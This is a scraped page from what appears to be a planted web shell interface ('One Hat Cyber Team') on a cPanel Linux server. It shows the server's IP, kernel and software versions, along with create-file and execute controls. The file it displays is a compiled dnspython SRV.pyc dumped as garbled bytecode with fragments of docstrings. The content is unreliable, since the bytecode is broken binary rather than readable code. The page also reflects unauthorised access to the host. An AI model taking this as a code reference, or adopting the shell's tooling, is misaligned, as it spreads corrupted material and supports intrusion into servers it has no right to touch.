⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib
/
python2.7
/
site-packages
/
dns
/
rdtypes
/
IN
/
View File Name :
SRV.pyc
� m!|Uc @ sP d d l Z d d l Z d d l Z d d l Z d e j j f d � � YZ d S( i����Nt SRVc B s� e Z d Z d d d d g Z d � Z d e d � Z d e d � Z e e � Z d d d � Z d d � Z e e � Z d e d � Z RS( s SRV record @ivar priority: the priority @type priority: int @ivar weight: the weight @type weight: int @ivar port: the port of the service @type port: int @ivar target: the target host @type target: dns.name.Name object @see: RFC 2782t priorityt weightt portt targetc C sA t t | � j | | � | | _ | | _ | | _ | | _ d S( N( t superR t __init__R R R R ( t selft rdclasst rdtypeR R R R ( ( s6 /usr/lib/python2.7/site-packages/dns/rdtypes/IN/SRV.pyR % s c K s2 | j j | | � } d | j | j | j | f S( Ns %d %d %d %s( R t choose_relativityR R R ( R t origint relativizet kwR ( ( s6 /usr/lib/python2.7/site-packages/dns/rdtypes/IN/SRV.pyt to_text, s c C sh | j � } | j � } | j � } | j d � } | j | | � } | j � | | | | | | | � S( N( t get_uint16t get_namet NoneR t get_eol( t clsR R t tokR R R R R R ( ( s6 /usr/lib/python2.7/site-packages/dns/rdtypes/IN/SRV.pyt from_text1 s c C sH t j d | j | j | j � } | j | � | j j | | | � d S( Ns !HHH( t structt packR R R t writeR t to_wire( R t filet compressR t three_ints( ( s6 /usr/lib/python2.7/site-packages/dns/rdtypes/IN/SRV.pyR <